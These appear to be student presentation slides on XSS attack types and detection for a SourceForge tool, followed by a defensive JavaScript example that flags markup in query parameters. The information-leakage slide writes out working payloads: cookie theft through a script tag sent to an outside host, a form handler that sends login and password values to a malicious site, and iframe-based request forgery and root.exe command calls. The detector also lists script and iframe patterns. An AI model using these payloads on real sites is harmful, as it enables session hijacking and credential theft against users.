Cross-Site Scripting (XSS) attack detection for web application
http://sourceforge.net/projects/xssalert7/
Author: Arjun Jain (07104701)
Department of Computer Science and Information Technology
Jaypee Institute of Information Technology
Sector-62 Noida, Uttar Pradesh
Agenda
- Overview of XSS attack
- Type of XSS attack
- Example
- Limitation of attack
- DOM security overview
- XSS alert working model
- Demo
What is Cross-Site Scripting (XSS)
Cross-site scripting (XSS) is a type of computer security vulnerability, typically found in web applications, that enables malicious attackers to inject client-side script into web pages viewed by others.
Types:
1: Reflected XSS
2: Stored XSS
3: DOM based XSS
- Ranked #1 in OWASP 2007 top 10
- Ranked #2 in OWASP 2010 top 10
- 7 out of 10 sites have XSS (Jeremiah Grossman, White Hat website security statistics report, Oct 2007)
Stored XSS
It refers to all XSS vulnerabilities where the adversary is able to permanently inject the malicious script into the vulnerable application's storage. The result is that every user who accesses the poisoned web page receives the injected script without further action by the adversary.
Unvalidated input in XSS
Unvalidated input resulted in a Cross-Site Scripting attack and the theft of the administrator’s cookies.
Types of Information leakage
- Client can reveal cookies to 3rd party (session state, order info, etc)
  http://host/a.php?variable="><script>document.location=http://www.cgisecurity.com/cgi-bin/cookie.cgi?%20+document.cookie</script >
- Client can reveal posted form items to 3rd party (userID/passwd, etc)
  <form> action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image;hackImg.src=http://www.malicioussite.com/+document.forms(1).login.value+:+document.forms(1).password.value;" </form>
- Client can be tricked into accessing/posting spoofed info to trusted server
  www.trustedserver.com/xss.asp?name =<iframe http://www.trustedserver.com/auth_area/orderupdate?items=4000 > </iframe>
- Client can be tricked into attacking other sites
  /hello.asp?name = <iframe src= http://vuln.iis.server/scripts/root.exe?/c+dir ></iframe>
Limitation of these attacks
- Usually only get one transaction with XSS code against vulnerable site
- Most attacks are only focused on collecting cookies
- POST based forms are seldom leveraged – almost always use GET methods
- Attacker does not know actual responses to client
- Some experts recommend using POST, hidden form inputs and other session state info to limit XSS risks.
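The request shapes on the information-leakage slide, seen from the server side: an added example, not code from the slides or from the XSS alert project, that flags query parameters carrying markup and shows the HTML-encoded form that would render as inert text. The function names, the pattern list, the placeholder base host and the sample requests are assumptions constructed for illustration.

```javascript
// Added example; encodeHtml, inspectQuery and SUSPICIOUS are hypothetical names.

// Encode the characters that let data break out of HTML text or a quoted attribute.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function encodeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Heuristic patterns for markup inside a parameter value.
// They support detection and logging; output encoding is what stops the injection.
const SUSPICIOUS = [
  { name: 'script-tag', re: /<\s*script\b/i },
  { name: 'iframe-tag', re: /<\s*iframe\b/i },
  { name: 'event-handler', re: /\bon[a-z]+\s*=/i },
  { name: 'attribute-breakout', re: /["']\s*>/ },
];

// Return one finding per query parameter whose decoded value matches a pattern.
function inspectQuery(rawUrl) {
  // The base host is a placeholder, used only so relative request paths parse.
  const url = new URL(rawUrl, 'http://placeholder.invalid');
  const findings = [];
  for (const [param, value] of url.searchParams) {
    const hits = SUSPICIOUS.filter((p) => p.re.test(value)).map((p) => p.name);
    if (hits.length > 0) {
      findings.push({ param, hits, encoded: encodeHtml(value) });
    }
  }
  return findings;
}

// Constructed sample requests shaped like the slide's examples, plus a benign one.
const SAMPLE_REQUESTS = [
  '/a.php?variable="><script>document.location=1</script>',
  '/hello.asp?name=<iframe src=http://example.invalid/></iframe>',
  '/hello.asp?name=Arjun',
];

for (const request of SAMPLE_REQUESTS) {
  const findings = inspectQuery(request);
  console.log(findings.length ? 'FLAG ' : 'OK   ', request, JSON.stringify(findings));
}
```

The patterns match the decoded parameter value, so percent-encoded variants of the same markup are flagged as well.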